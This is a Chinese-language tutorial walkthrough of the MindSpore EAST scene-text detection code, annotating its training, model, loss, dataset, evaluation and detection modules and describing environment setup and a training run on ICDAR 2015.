    datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
    args.logger = get_logger(args.outputs_dir, args.rank) # 调用 get_logger()函数创建一个日志记录器,并将日志保存在 args.outputs_dir 目录下
    args.logger.save_args(args) # 将所有参数保存在日志文件中

    if __name__ == "__main__":

    优化

    进行代码加速优化

    if args.need_profiler:
    # 创建一个性能分析器,并将结果保存在args.outputs_dir路径下
    profiler = Profiler(
    output_path=args.outputs_dir,
    is_detail=True,
    is_show_op_path=True)

    # 创建一个AverageMeter对象用于记录损失值的平均值,以便后续输出和打印
    loss_meter = AverageMeter('loss')

    # 重置自动并行上下文
    context.reset_auto_parallel_context()
    parallel_mode = ParallelMode.STAND_ALONE
    degree = 1
    # 又是分布式计算相关……
    if args.is_distributed:
    parallel_mode = ParallelMode.DATA_PARALLEL
    degree = args.group_size
    context.set_auto_parallel_context(
    parallel_mode=parallel_mode,
    gradients_mean=True,
    device_num=degree)

    加载模型
    network = EAST()  # 设置 network,加载 EAST 模型
    # default is kaiming-normal
    default_recurisive_init(network) # 对 EAST 模型进行默认的递归初始化。这里使用的是 kaiming-normal(He 正态分布)初始化方法

    # load pretrained_backbone
    if args.pretrained_backbone: # 如果不为 None,载入预训练的 backbone 模型
    parm_dict = load_checkpoint(args.pretrained_backbone) # 加载模型参数
    load_param_into_net(network, parm_dict) # 将模型参数加载到 network 上
    args.logger.info('finish load pretrained_backbone') # 在日志中记录加载完成的信息

    network = EastWithLossCell(network) # 将 EAST 模型和损失函数进行结合,即将模型传入 EastWithLossCell()函数,得到组合后的模型对象
    if args.resume_east: # 如果 args.resume_east 不为 None,继续训练之前保存的 EAST 模型,resume:恢复,继续
    param_dict = load_checkpoint(args.resume_east)
    load_param_into_net(network, param_dict)
    args.logger.info('finish get resume east')

    args.logger.info('finish get network')

    # 载入数据集,调用 create_east_dataset()函数,传入图片文件夹路径、文本文件夹路径、批量大小、设备数量、进程编号等参数,获取数据集以及数据总数,并在日志中记录加载完成的信息。
    ds, data_size = create_east_dataset(img_root=args.data_root, txt_root=args.txt_root, batch_size=args.per_batch_size,
    device_num=args.group_size, rank=args.rank, is_training=True)
    args.logger.info('Finish loading dataset')

    # 计算每个 epoch 中的步数,即将数据总数、批量大小和设备数量进行计算得到
    args.steps_per_epoch = int(
    data_size /
    args.per_batch_size /
    args.group_size)

    if not args.ckpt_interval:
    # 如果 args.ckpt_interval 为空,则将其设置为每个 epoch 的步数
    args.ckpt_interval = args.steps_per_epoch

    设置优化器
    # get learnning rate
    lr = get_lr(args) # 函数获取当前epoch的学习率,并将其赋值给变量lr
    opt = Adam( # 使用Adam优化器进行优化,并指定优化器的参数为EAST模型中需要更新的参数
    params=get_param_groups(network),
    learning_rate=Tensor(
    lr,
    ms.float32))
    loss_scale = FixedLossScaleManager(1.0, drop_overflow_update=True) # 固定的损失缩放管理器
    model = Model(network, optimizer=opt, loss_scale_manager=loss_scale) # 使用Model函数从EAST模型对象和优化器拼接出一个完整的训练模型,并将损失缩放管理器传入
    # 这样就生成了完整的训练模型对象,并且可以对其进行训练

    训练

    开始训练

    network.set_train()  # 将网络设置为训练状态
    # save the network model and parameters for subsequence fine-tuning
    # 设置保存检查点的配置信息,包括保存检查点的步数和最大保存数量,并将其赋值给变量 config_ck
    config_ck = CheckpointConfig(
    save_checkpoint_steps=100,
    keep_checkpoint_max=1)
    # group layers into an object with training and evaluation features
    # 指定模型参数保存路径
    save_ckpt_path = os.path.join(
    args.outputs_dir, 'ckpt_' + str(args.rank) + '/')
    # 使用 ModelCheckpoint()函数创建一个回调函数,用于保存训练模型参数
    ckpoint_cb = ModelCheckpoint(
    prefix="checkpoint_east",
    directory=save_ckpt_path,
    config=config_ck)
    # 创建一个回调函数,用于保存训练模型参数。其中,prefix 参数指定保存文件名的前缀,directory 参数指定保存路径,config 参数指定保存配置信息。
    callback = [
    TimeMonitor(data_size=data_size),
    LossMonitor(),
    ckpoint_cb
    ]
    # 调用 model.train()方法对训练模型进行训练,传入总 epoch 数、数据集以及之前定义的回调函数列表。在训练过程中,启用了数据集下沉模式,即 dataset_sink_mode=True,以提高训练效率
    model.train(
    args.max_epoch,
    ds,
    callbacks=callback,
    dataset_sink_mode=True)
    args.logger.info('==========end training===============')

    src/util.py

    定义了一些工具人类和函数,看不懂 orz:

    • class AverageMeter:记录各个指标的训练过程中的平均值和当前值
    • default_wd_filter():定义了一个默认的权重衰减过滤器函数,过滤掉不需要进行权重衰减的参数,例如偏置项和批归一化层中的偏置项和权重
    • get_param_groups():接受一个神经网络模型network作为参数,并将其可训练参数分成有权重衰减和无权重衰减两个组,并返回一个包含参数组信息的列表,每个参数组都包含paramsweight_decay两个键值对
    • class ShapeRecord:记录图像大小的类

    src/east.py

    class EAST

    定义了一个 EAST 网络的类 EAST

    class EAST(nn.Cell):
    def __init__(self):
    super(EAST, self).__init__()
    # 提取图像特征的模块,返回 5 组特征图用于后续处理
    self.extractor = VGG16FeatureExtraction()
    # 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
    self.merge = Merge()
    # 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数 score 和几何信息预测值 geo
    self.output = Output()

    def construct(self, x_1):
    # 通过 x_1 输入数据调用 self.extractor()获取 5 组特征图
    f_0, f_1, f_2, f_3, f_4 = self.extractor(x_1)
    # 将这些特征图传入 self.merge()模块进行拼接,得到拼接后的特征图
    x_1 = self.merge(f_0, f_1, f_2, f_3, f_4)
    # 将该特征图输入到 self.output()模块获得文本区域预测分数 score 和几何信息预测值 geo
    score, geo = self.output(x_1)

    return score, geo

    png

    代码对应的就是论文里的三个部分了:

    • Feature extractor stem (PVANet) - class VGG16FeatureExtraction
      • 提取图像特征的模块,返回 5 组特征图用于后续处理
    • Feature-merging branch - class Merge
      • 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
    • Output layer - class Output
      • 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数score和几何信息预测值geo

    class VGG16FeatureExtraction

    大致就是定义了一堆卷积核,然后按照论文里的方式一阵卷,返回 5 组特征图,但是特征图的标号好像跟论文里是反着来的。

    class VGG16FeatureExtraction(nn.Cell):
    """VGG16FeatureExtraction for deeptext"""

    def __init__(self):
    super(VGG16FeatureExtraction, self).__init__()
    self.relu = nn.ReLU()
    self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
    self.avg_pool = nn.AvgPool2d(kernel_size=2, stride=2)

    self.conv1_1 = _conv(
    in_channels=3,
    out_channels=64,
    kernel_size=3,
    padding=1)

    ……

    self.conv5_3 = _conv(
    in_channels=512,
    out_channels=512,
    kernel_size=3,
    padding=1)
    self.cast = P.Cast()

    def construct(self, out):
    """ Construction of VGG """
    f_0 = out
    out = self.cast(out, mstype.float32)
    out = self.conv1_1(out)
    out = self.relu(out)
    out = self.conv1_2(out)
    out = self.relu(out)
    out = self.max_pool(out)

    ……

    out = self.max_pool(out)
    f_4 = out
    out = self.conv5_1(out)
    out = self.relu(out)
    out = self.conv5_2(out)
    out = self.relu(out)
    out = self.conv5_3(out)
    out = self.relu(out)
    out = self.max_pool(out)
    f_5 = out

    return f_0, f_2, f_3, f_4, f_5

    class Merge

    P是 MindSpore 中的一个模块,代表了运算符(operators)。我们可以通过import mindspore.ops as P来引入这个模块,从而使用其中定义的各种运算符函数,例如上述代码中使用的Concat()ResizeBilinear()函数。

    也是定义一堆函数:

    • ResizeBilinear():是 MindSpore 中的一个图像处理函数,在图像上进行双线性插值,将输入图像缩放到指定大小。由于该模型中需要特征融合操作,因此使用该函数将不同尺度的特征图调整到相同尺寸,便于进行特征拼接。
    • concat():特征图拼接
    • nn.BatchNorm2d(128):是 MindSpore 中的一个二维批归一化函数,用于对网络模型中的卷积层或全连接层的输出进行归一化处理,以便更好地协调不同神经元之间的协同工作。
    • relu():激活函数
    class Merge(nn.Cell):
    def __init__(self):
    super(Merge, self).__init__()

    self.conv1 = nn.Conv2d(1024, 128, 1, has_bias=True)
    self.bn1 = nn.BatchNorm2d(128)
    self.relu1 = nn.ReLU()
    self.conv2 = nn.Conv2d(
    128,
    128,
    3,
    padding=1,
    pad_mode='pad',
    has_bias=True)
    self.bn2 = nn.BatchNorm2d(128)
    self.relu2 = nn.ReLU()

    ……

    def construct(self, x, f1, f2, f3, f4):
    img_hight = P.Shape()(x)[2]
    img_width = P.Shape()(x)[3]

    out = P.ResizeBilinear((img_hight / 16, img_width / 16), True)(f4)
    out = self.concat((out, f3))
    out = self.relu1(self.bn1(self.conv1(out)))
    out = self.relu2(self.bn2(self.conv2(out)))

    out = P.ResizeBilinear((img_hight / 8, img_width / 8), True)(out)
    out = self.concat((out, f2))
    out = self.relu3(self.bn3(self.conv3(out)))
    out = self.relu4(self.bn4(self.conv4(out)))

    out = P.ResizeBilinear((img_hight / 4, img_width / 4), True)(out)
    out = self.concat((out, f1))
    out = self.relu5(self.bn5(self.conv5(out)))
    out = self.relu6(self.bn6(self.conv6(out)))

    out = self.relu7(self.bn7(self.conv7(out)))
    return out

    class Output
    class Output(nn.Cell):
    def __init__(self, scope=512):
    super(Output, self).__init__()
    self.conv1 = nn.Conv2d(32, 1, 1)
    self.sigmoid1 = nn.Sigmoid()
    self.conv2 = nn.Conv2d(32, 4, 1)
    self.sigmoid2 = nn.Sigmoid()
    self.conv3 = nn.Conv2d(32, 1, 1)
    self.sigmoid3 = nn.Sigmoid()
    self.scope = scope
    self.concat = P.Concat(axis=1)
    self.PI = 3.1415926535898

    def construct(self, x):
    score = self.sigmoid1(self.conv1(x)) # 文本区域得分
    loc = self.sigmoid2(self.conv2(x)) * self.scope # 位置
    angle = (self.sigmoid3(self.conv3(x)) - 0.5) * self.PI # 倾斜角度
    geo = self.concat((loc, angle)) # 边界框信息包含位置和倾斜角度
    return score, geo # 最终返回文本区域得分和拼接后的边界框信息

    class EastLossBlock

    在该模块计算损失时,首先计算分类损失,即将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失。

    接着,将预测得到的位置信息和真实标注的位置信息分别拆分出来,通过计算交并比(IoU)和角度误差得到位置损失,最终通过加权平均作为总体的位置损失。其中,角度误差使用余弦相似度计算。

    在计算位置损失时,还需考虑训练集中的样本是否为真实文本区域,需将训练集中非文本区域处的位置信息、分类标注和对应的模型预测结果剔除掉,以避免这些数据对损失计算的干扰。

    最后将分类损失和位置损失加权求和,作为总体损失并返回。

    class EastLossBlock(nn.Cell):
    def __init__(self):
    super(EastLossBlock, self).__init__()
    self.split = P.Split(1, 5)
    self.min = MyMin()
    self.log = P.Log()
    self.cos = P.Cos()
    self.mean = P.ReduceMean(keep_dims=False)
    self.sum = P.ReduceSum()
    self.eps = 1e-5
    self.dice = DiceCoefficient()

    def construct(
    self,
    y_true_cls,
    y_pred_cls,
    y_true_geo,
    y_pred_geo,
    training_mask):
    ans = self.sum(y_true_cls)
    # 将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失
    classification_loss = self.dice(
    y_true_cls, y_pred_cls * (1 - training_mask))

    # n * 5 * h * w
    # 将预测得到的位置信息和真实标注的位置信息分别拆分出来
    d1_gt, d2_gt, d3_gt, d4_gt, theta_gt = self.split(y_true_geo)
    d1_pred, d2_pred, d3_pred, d4_pred, theta_pred = self.split(y_pred_geo)
    area_gt = (d1_gt + d3_gt) * (d2_gt + d4_gt)
    area_pred = (d1_pred + d3_pred) * (d2_pred + d4_pred)
    w_union = self.min(d2_gt, d2_pred) + self.min(d4_gt, d4_pred)
    h_union = self.min(d1_gt, d1_pred) + self.min(d3_gt, d3_pred)

    area_intersect = w_union * h_union
    area_union = area_gt + area_pred - area_intersect
    # 通过计算交并比(IoU)和角度误差得到位置损失
    iou_loss_map = -self.log((area_intersect + 1.0) /
    (area_union + 1.0)) # iou_loss_map
    angle_loss_map = 1 - self.cos(theta_pred - theta_gt) # angle_loss_map

    # 角度误差使用余弦相似度计算
    angle_loss = self.sum(angle_loss_map * y_true_cls) / ans
    iou_loss = self.sum(iou_loss_map * y_true_cls) / ans
    geo_loss = 10 * angle_loss + iou_loss

    return geo_loss + classification_loss

    class EastWithLossCell
    class EastWithLossCell(nn.Cell):
    def __init__(self, network):
    super(EastWithLossCell, self).__init__()
    # 传入一个EAST模型,作为计算图中的网络模块
    self.east_network = network
    # 实例化了EastLossBlock类,作为计算图中的损失函数模块
    self.loss = EastLossBlock()

    def construct(self, img, true_cls, true_geo, training_mask):
    '''
    img: 输入图片
    true_cls: 分类标注
    true_geo: 位置标注
    training_mask: 训练集中的掩码(用于过滤掉非真实文本区域的数据)
    '''
    # 调用计算图进行前向计算
    socre, geometry = self.east_network(img)
    # 将计算得到的分类得分和位置信息分别传给损失函数模块进行后向计算,得到整体的损失值并返回
    loss = self.loss(
    true_cls,
    socre,
    true_geo,
    geometry,
    training_mask)
    return loss

    src/dataset.py

    create_east_dataset()
    def create_east_dataset(
    img_root,
    txt_root,
    batch_size,
    device_num,
    rank,
    is_training=True):
    # 实例化 ICDAREASTDataset 类,传入图片和文本标注的路径,用于读取并解析图像和标注
    east_data = ICDAREASTDataset(img_path=img_root, gt_path=txt_root)
    # 生成分布式采样器,用于在多个设备之间对数据进行划分和分发。
    distributed_sampler = DistributedSampler(
    len(east_data), device_num, 0 if device_num == 1 else rank, shuffle=True)

    trans_list = [CV.RandomColorAdjust(0.5, 0.5, 0.5, 0.25), # 随机改变图像的颜色饱和度、对比度和亮度
    CV.Rescale(1 / 255.0, 0), # 对图像进行缩放
    CV.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), # 图像正则化处理
    CV.HWC2CHW()] # 将图像的通道维度从 HWC(高×宽×通道数)顺序转换为 CHW(通道数×高×宽)顺序
    if is_training: # 如果是训练模式
    dataset_column_names = [
    "image", # 图像
    "score_map", # 分类标注分数图
    "geo_map", # 位置标注几何图
    "training_mask"] # 训练集掩码
    # 调用 MindSpore 中的 GeneratorDataset 类生成数据集
    ds = de.GeneratorDataset(
    east_data,
    column_names=dataset_column_names,
    num_parallel_workers=32, # 数据处理和增强过程中使用的并行线程数
    # sampler 参数则指定了数据采样器,即从数据集中选择数据样本的方式,
    # 本例中使用的是前面提到的分布式采样器 distributed_sampler
    sampler=distributed_sampler)
    # 调用 map()方法将数据集中的图像列传入变换列表中的操作进行增广
    ds = ds.map(
    operations=trans_list,
    input_columns=["image"],
    num_parallel_workers=8,
    python_multiprocessing=True)
    # 使用 batch()方法将批量大小对数据集进行划分
    ds = ds.batch(batch_size, num_parallel_workers=8, drop_remainder=True)

    return ds, len(east_data)

    class ICDAREASTDataset
    class ICDAREASTDataset:
    def __init__(self, img_path, gt_path, scale=0.25, length=512):
    super(ICDAREASTDataset, self).__init__()
    self.img_files = [os.path.join(
    img_path,
    img_file) for img_file in sorted(os.listdir(img_path))]
    self.gt_files = [
    os.path.join(
    gt_path,
    gt_file) for gt_file in sorted(
    os.listdir(gt_path))]
    self.scale = scale # 缩放比例
    self.length = length # 裁剪后的图像长度

    def __getitem__(self, index):
    with open(self.gt_files[index], 'r') as f:
    lines = f.readlines()
    vertices, labels = extract_vertices(lines) # 从文本标注中提取文本区域的顶点坐标和标注

    img = Image.open(self.img_files[index]) # 读取图像
    img, vertices = adjust_height(img, vertices) # 调整高度
    img, vertices = rotate_img(img, vertices) # 随机旋转图像
    img, vertices = crop_img(img, vertices, labels, self.length) # 将图像切割成指定长度的大小
    score_map, geo_map, ignored_map = get_score_geo(
    img, vertices, labels, self.scale, self.length) # 分类标注分数图、位置标注几何图和忽略标注
    score_map = score_map.transpose(2, 0, 1)
    ignored_map = ignored_map.transpose(2, 0, 1)
    geo_map = geo_map.transpose(2, 0, 1)
    if np.sum(score_map) < 1:
    score_map[0, 0, 0] = 1
    return img, score_map, geo_map, ignored_map

    def __len__(self):
    return len(self.img_files)

    extract_vertices()
    def extract_vertices(lines):
    '''extract vertices info from txt lines
    Input:
    lines : list of string info 输入是一个字符串列表 lines,其中每个字符串包含了一个文本区域的信息,包括顶点坐标和标签等
    Output:
    vertices: vertices of text regions <numpy.ndarray, (n,8)> 所有文本区域的顶点坐标
    labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)> 标签
    '''
    labels = [] # 存储最终的标签
    vertices = [] # 存储顶点信息
    for line in lines:
    # 通过 rstrip()和 lstrip()函数去除其前后空格和 BOM(Byte Order Mark)等特殊字符,并使用 split()函数将其切分为一个包含八个整数的列表
    vertices.append(list(map(int, line.rstrip('\n').lstrip('\ufeff').split(',')[:8])))
    label = 0 if '###' in line else 1
    labels.append(label)
    # 返回顶点和标签的 numpy 数组
    return np.array(vertices), np.array(labels)

    adjust_height()
    def adjust_height(img, vertices, ratio=0.2):
    '''adjust height of image to aug data
    Input:
    img : PIL Image
    vertices : vertices of text regions <numpy.ndarray, (n,8)>
    ratio : height changes in [0.8, 1.2]
    Output:
    img : adjusted PIL Image
    new_vertices: adjusted vertices
    '''
    ratio_h = 1 + ratio * (np.random.rand() * 2 - 1) # 随机调整输入图像的高度
    old_h = img.height
    # 根据输入的高度缩放比例ratio_h,计算调整后的图像新高度new_h。
    # 原始图像的高度由变量old_h指定,通过乘以缩放比例并四舍五入取整来得到调整后的高度。
    # np.around()函数是NumPy库中的一个函数,用于对数组进行四舍五入,其默认精度为0
    new_h = int(np.around(old_h * ratio_h))
    img = img.resize((img.width, new_h), Image.BILINEAR)

    new_vertices = vertices.copy()
    if vertices.size > 0:
    new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * (new_h / old_h)
    # 返回调整后的图像和更新后的顶点坐标
    return img, new_vertices

    rotate_img()
    def rotate_img(img, vertices, angle_range=10):
    '''rotate image [-10, 10] degree to aug data
    Input:
    img : PIL Image
    vertices : vertices of text regions <numpy.ndarray, (n,8)>
    angle_range : rotate range
    Output:
    img : rotated PIL Image
    new_vertices: rotated vertices
    '''
    # 获得中心旋转点
    center_x = (img.width - 1) / 2
    center_y = (img.height - 1) / 2
    angle = angle_range * (np.random.rand() * 2 - 1)
    # 使用了 BILINEAR 滤波器来进行图像插值,以获得更好的旋转效果
    img = img.rotate(angle, Image.BILINEAR)
    # 定义一个大小为 vertices.shape 的全零 NumPy 数组 new_vertices,用于存储旋转后的顶点坐标
    new_vertices = np.zeros(vertices.shape)
    for i, vertice in enumerate(vertices):
    # 遍历每个文本区域的顶点坐标,调用 rotate_vertices()函数来计算旋转后的新坐标,然后将其保存到 new_vertices 中
    new_vertices[i, :] = rotate_vertices(
    vertice, -angle / 180 * math.pi, np.array([[center_x], [center_y]]))
    return img, new_vertices

    crop_img()
    def crop_img(img, vertices, labels, length):
    '''crop img patches to obtain batch and augment
    Input:
    img : PIL Image
    vertices : vertices of text regions <numpy.ndarray, (n,8)>
    labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
    length : length of cropped image region
    Output:
    region : cropped image region
    new_vertices: new vertices in cropped region
    '''
    # 获取原始图像的高度h和宽度w
    h, w = img.height, img.width
    # confirm the shortest side of image >= length
    # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
    if h >= w and w < length:
    img = img.resize((length, int(h * length / w)), Image.BILINEAR)
    elif h < w and h < length:
    img = img.resize((int(w * length / h), length), Image.BILINEAR)
    ratio_w = img.width / w
    ratio_h = img.height / h
    assert (ratio_w >= 1 and ratio_h >= 1)

    # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
    new_vertices = np.zeros(vertices.shape)
    if vertices.size > 0:
    new_vertices[:, [0, 2, 4, 6]] = vertices[:, [0, 2, 4, 6]] * ratio_w
    new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * ratio_h

    # find random position
    # 生成随机的裁剪位置,检查裁剪区域是否与文本区域相交,避免将裁剪区域中的文本区域遮盖或截断
    remain_h = img.height - length
    remain_w = img.width - length
    flag = True
    cnt = 0
    while flag and cnt < 1000:
    # 若随机裁剪的位置与文本区域有交集,则继续生成新的随机位置,
    # 直到找到一个合适的位置或者超过最大尝试次数1000次为止
    cnt += 1
    start_w = int(np.random.rand() * remain_w)
    start_h = int(np.random.rand() * remain_h)
    flag = is_cross_text([start_w, start_h], length,
    new_vertices[labels == 1, :])
    box = (start_w, start_h, start_w + length, start_h + length)
    # 使用PIL库提供的crop()方法从原始图像中截取指定大小的区域,并将其作为本函数的输出返回。
    region = img.crop(box)
    if new_vertices.size == 0:
    # 如果不存在任何文本区域,则直接返回裁剪后的图像区域和空的新顶点坐标
    return region, new_vertices
    # 更新文本区域的顶点坐标。将新的裁剪图像左上角的坐标(start_w, start_h)作为原点,计算相对于这个原点的顶点坐标,并将这个相对坐标赋值给new_vertices
    new_vertices[:, [0, 2, 4, 6]] -= start_w
    new_vertices[:, [1, 3, 5, 7]] -= start_h
    return region, new_vertices

    eval.py

    先使用 argparse 设置一堆参数:

    nametypedefaulthelp
    –device_targetstr‘Ascend’evice where the code will be implemented. (Default: Ascend)
    –device_numint5设备数,如果只有 1 个设备的话,设成 5 不能跑,设成 0 能跑
    –test_img_pathstr‘./data/icdar2015/Test/images/’测试集地址
    –checkpoint_pathstr模型地址
    context.set_context(
    mode=context.GRAPH_MODE, # 图模式
    device_target=args.device_target, # 设备类型
    save_graphs=False, # 是否保存计算图
    device_id=args.device_num) # 设备编号

    main

    设置一下模型、数据集、保存路径、开跑!

    if __name__ == '__main__':
    model_name = args.checkpoint_path
    test_img_path = args.test_img_path
    submit_path = './submit'
    eval_model(model_name, test_img_path, submit_path)

    eval_model()
    def eval_model(name, img_path, submit, save_flag=True):
    '''
    name: 模型的 checkpoint 文件路径
    img_path: 测试集图片所在的文件夹路径
    submit: 输出结果保存的文件夹路径
    save_flag: 是否保存中间结果
    '''
    # 判断输出结果保存的目录是否存在,如果存在则删除该目录及其子目录,然后重新创建一个同名目录
    if os.path.exists(submit):
    shutil.rmtree(submit)
    os.mkdir(submit)
    # 构建 EAST 模型
    network = EAST()
    # 加载预训练权重参数
    param_dict = load_checkpoint(name)
    load_param_into_net(network, param_dict)
    # 设置模型为训练模式
    network.set_train(True)

    start_time = time.time()
    # 调用 detect_dataset()函数对测试集图片进行检测,并将检测结果保存到指定的输出目录 submit 中
    detect_dataset(network, img_path, submit)
    os.chdir(submit)
    res = subprocess.getoutput('zip -q submit.zip *.txt')
    res = subprocess.getoutput('mv submit.zip ../')
    os.chdir('../')
    # 调用评估脚本./evaluate/script.py 来计算模型的性能指标,评估结果保存在字符串变量 res 中
    res = subprocess.getoutput(
    'python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
    print(res)
    os.remove('./submit.zip')
    print('eval time is {}'.format(time.time() - start_time))

    if not save_flag:
    # 如果 save_flag 为 False,则删除输出目录及其子目录(闻到了屎山的味道)
    shutil.rmtree(submit)

    detect.py

    detect_dataset()
    def detect_dataset(model, test_img_path, submit_path):
    """
    detection on whole dataset, save .txt results in submit_path
    Input:
    model : detection model 模型实例
    device : gpu if gpu is available
    test_img_path: dataset path 测试图片所在文件夹的路径
    submit_path : submit result for evaluation 提交结果保存路径
    """
    # 读取测试集中所有的图片,并按照文件名排序
    img_files = os.listdir(test_img_path)
    img_files = sorted([os.path.join(test_img_path, img_file)
    for img_file in img_files])

    for i, img_file in enumerate(img_files):
    # 对于每一张图片,调用detect()函数进行目标检测,返回目标框的坐标信息
    print('evaluating {} image'.format(i), end='\r')
    boxes = detect(Image.open(img_file), model)
    seq = []
    if boxes is not None:
    # 如果检测结果不为空,则将框的坐标信息转换成符合要求的字符串序列并加入到列表seq中
    seq.extend([','.join([str(int(b))
    for b in box[:-1]]) + '\n' for box in boxes])
    # 将序列seq保存为与当前图片名称相同的.txt文件格式,并将其写入submit_path目录下
    with open(os.path.join(submit_path, 'res_' +
    os.path.basename(img_file).replace('.jpg', '.txt')), 'w') as f:
    f.writelines(seq) # 当检测完成后,输出log信息提示检测进度

    detect()
    def detect(img, model):
    """detect text regions of img using model
    Input:
    img : PIL Image
    model : detection model
    device: gpu if gpu is available
    Output:
    detected polys
    """
    # 将输入图片进行尺寸调整与相应的 ratio 变换,得到调整后的图片、高宽比例 ratio_h 和 ratio_w
    img, ratio_h, ratio_w = resize_img(img)
    # 利用模型对调整后的图片进行文字区域检测,得到概率图 score 和文本框参数 geo
    score, geo = model(load_pil(img))
    # 对概率图和文本框参数使用 PaddlePaddle 中的 Squeeze()函数进行维度降低(由 4 维转为 3 维)
    score = P.Squeeze(0)(score)
    geo = P.Squeeze(0)(geo)
    # 从降维后的概率图和文本框参数中获取文本框坐标信息,即调用 get_boxes()函数
    boxes = get_boxes(score.asnumpy(), geo.asnumpy())
    # 根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息,即调用 adjust_ratio()函数
    return adjust_ratio(boxes, ratio_w, ratio_h)

    get_boxes()
    def get_boxes(score, geo, score_thresh=0.9, nms_thresh=0.2):
    """get boxes from feature map
    Input:
    score : score map from model <numpy.ndarray, (1,row,col)> 概率图
    geo : geo map from model <numpy.ndarray, (5,row,col)> 文本框参数
    score_thresh: threshold to segment score map 置信度阈值
    nms_thresh : threshold in nms 非极大值抑制阈值
    Output:
    boxes : final polys <numpy.ndarray, (n,9)>
    """
    # 对输入的score进行降维,即将其转化为二维数组
    score = score[0, :, :]
    # 在降维后的score数组中,找到大于score_thresh的点,并以(r,c)的格式记录下来,形成一个n x 2的矩阵xy_text
    xy_text = np.argwhere(score > score_thresh) # n x 2, format is [r, c]
    # 按行排序xy_text,以保证前面的点在结果中优先考虑
    if xy_text.size == 0:
    return None

    # 将xy_text中的坐标信息转化为正确的x,y坐标(由于降维之前是按行major的顺序排列,因此需要将列号作为x坐标,行号作为y坐标)
    xy_text = xy_text[np.argsort(xy_text[:, 0])]
    valid_pos = xy_text[:, ::-1].copy() # n x 2, [x, y]
    # 从降维后的geo数组中提取出与xy_text中相应位置点相关的文本框参数,形成5 x n的矩阵valid_geo
    valid_geo = geo[:, xy_text[:, 0], xy_text[:, 1]] # 5 x n
    # 利用restore_polys()函数将valid_pos和valid_geo还原为文本框的坐标点集polys_restored,并得到对应的索引值index
    polys_restored, index = restore_polys(valid_pos, valid_geo, score.shape)
    if polys_restored.size == 0:
    return None

    # 将polys_restored表示为(n,8)大小的数组,其中前8列分别为文本框像素点的坐标,第9列为该文本框的置信度(即所在score map中的值)
    boxes = np.zeros((polys_restored.shape[0], 9), dtype=np.float32)
    boxes[:, :8] = polys_restored
    boxes[:, 8] = score[xy_text[index, 0], xy_text[index, 1]]
    # 对polys_restored执行非极大值抑制(NMS)操作,得到最终的文本框坐标信息boxes
    boxes = lanms.merge_quadrangle_n9(boxes.astype('float32'), nms_thresh)
    return boxes

    adjust_ratio()

    根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息

    def adjust_ratio(boxes, ratio_w, ratio_h):
    """refine boxes
    Input:
    boxes : detected polys <numpy.ndarray, (n,9)>
    ratio_w: ratio of width
    ratio_h: ratio of height
    Output:
    refined boxes
    """
    if boxes is None or boxes.size == 0:
    return None
    boxes[:, [0, 2, 4, 6]] /= ratio_w
    boxes[:, [1, 3, 5, 7]] /= ratio_h
    return np.around(boxes)

    跑!

    1. 变更一个 mindspore 2.0 的镜像,太旧的 mindspore 会寄……

    png

    1. EAST for Ascend - Gitee.com 把仓库整下来,最好整到 work/ 文件夹里,这样服务器重启过后数据还能保留。训练这玩意还需要:
    • Dataset: ICDAR 2015: Focused Scene Text,这个数据集,1000 张训练集,500 张测试集

    • The pretrained_path should be a checkpoint of vgg16 trained on Imagenet2012. vgg 在 Imagenet2012 里预训练过的模型,它还不给下载地址,让我找老半天,哼

      • MindSpore 官网 - 资源 - Hub 搜索 vgg16,找到 下载地址,下载 vgg16_ascend_v190_imagenet2012_official_cv_top1acc73.49_top5acc91.56.ckpt

        png

    1. 调整仓库里的 parser 参数、数据集的位置和预训练模型的位置,使得路径对应一致。

    In this project, the file organization is recommended as below:

    .
    └─data
    ├─icdar2015
    ├─Training # Training set
    ├─image # Images in training set
    ├─groundTruth # GT in training set
    └─Test # Test set
    ├─image # Images in training set
    ├─groundTruth # GT in training set

    png

    1. 安装环境一条龙!requirements.txt 里面的玩意着实难装,还是手动装好了……
    source activate base  # 第一次进服务器激活需要 activate base
    python -c "import mindspore;mindspore.run_check()" # 查看 mindspore 版本
    conda create -n east --clone base # 克隆 base 环境
    conda activate east # 激活 east 环境
    pip install numpy
    pip install opencv-python
    pip install shapely
    pip install pillow
    pip install lanms-neo
    pip install --upgrade setuptools # 更新 setuptools
    pip install Polygon3 # 这个库很难装,可能需要更新 setuptools
    pip install onnxruntime

    ​ 装好环境后可以保存一下镜像,这样下次重开服务器的时候就会保留之前安装好的环境:

    png

    1. 切到仓库目录,开跑 train.py
    cd /home/ma-user/work/east/
    python3 train.py

    png

    ​ 显示完超参数后,就开始 train 了,继续等呗。

    png

    1. 训练时间从 14:2718:41,就能炼出仙丹一枚:checkpoint_east-600_125.ckpt

    png

    1. 设置一下 eval.py 的参数:
    • --device_num Ascend 设备的数量,因为我只租了 1 个,所以设为 0
    • --test_img_path 测试集路径,evaluate 时会读取这里面的图片
    • --checkpoint_path 模型的路径,把它设为刚刚炼好的仙丹的路径:outputs/2023-05-15_time_14_27_25/ckpt_0/checkpoint_east-600_125.ckpt

    png

    1. The evaluation scripts are from ICDAR Offline evaluation and have been modified to run successfully with Python 3.7.1.

      从上面这个链接里下载 script_test_ch4_t1_e1-1577983151.zip,并放在 evaluate/中:

      png

    2. 开跑 eval.py

    python3 eval.py

